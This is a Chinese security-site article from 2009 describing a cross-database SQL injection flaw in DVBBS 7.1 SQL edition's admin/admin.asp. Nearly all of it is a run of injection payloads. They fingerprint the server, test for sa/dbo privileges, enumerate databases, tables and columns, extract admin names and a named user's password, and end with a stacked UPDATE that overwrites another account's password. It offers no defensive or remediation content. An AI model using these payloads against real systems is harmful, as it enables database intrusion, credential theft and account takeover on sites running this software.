首页 网络安全 安全学院 查看内容

DVBBS7.1 SQL版 跨库漏洞

2009-2-11 01:45 507 0

摘要: 作者:Gui哥 文章来源:www.54nb.cn 漏洞测试环境:DVBBS7.1 SQL 受影响文件admin/admin.asp..... 漏洞利用 (se...
关键词: select JxSoufun name where 查询 dbo nbsp admin 数据库 用户

作者:Gui哥 文章来源:www.54nb.cn 漏洞测试环境:DVBBS7.1 SQL 受影响文件admin/admin.asp..... 漏洞利用 (select @@version)>0 获得Windows的版本号and user_name()='dbo' 判断当前系统的连接用户是不是sa(select user_name())>0 爆当前系统的连接用户(select db_name())>0 得到当前连接的数据库(select IS_MEMBER('db_owner')) --查询数据库当前用户权限 (select count(*) from master.dbo.sysdatabases where name>1 and dbid=7)   ---查询所有数据库名(select top 1 name from JxSoufun.dbo.sysobjects where xtype='U') --查询数据库表名(select top 1 name from JxSoufun.dbo.sysobjects where xtype='U' and name not in ('web_Admin'))  --查询数据库所有表名(select count(*) from JxSoufun.dbo.sysobjects where xtype='U' and name='web_Admin' and uid>(str(id)))  --查询表名ID(select top 1 name from JxSoufun.dbo.syscolumns where id=1125579048) --查询字段名(select top 1 name from JxSoufun.dbo.syscolumns where id=1125579048 and name not in('adminname'))  --查询所有字段名(select count(*) from JxSoufun.dbo.web_Admin where AdminName>1) -查询用户(select count(*) from JxSoufun.dbo.web_Admin where Adminpwd>1 and username='bluefire') -查询用户bluefire密码;update JxSoufun.dbo.Agency_User set userpwd='965eb72c92a549dd' where username='mthfc';--   
声明:文章版权归原作者所有 部分文章转自互联网 如有侵权请联系 [邮箱地址] 删除

路过

雷人

握手

鲜花

鸡蛋

最新评论

返回顶部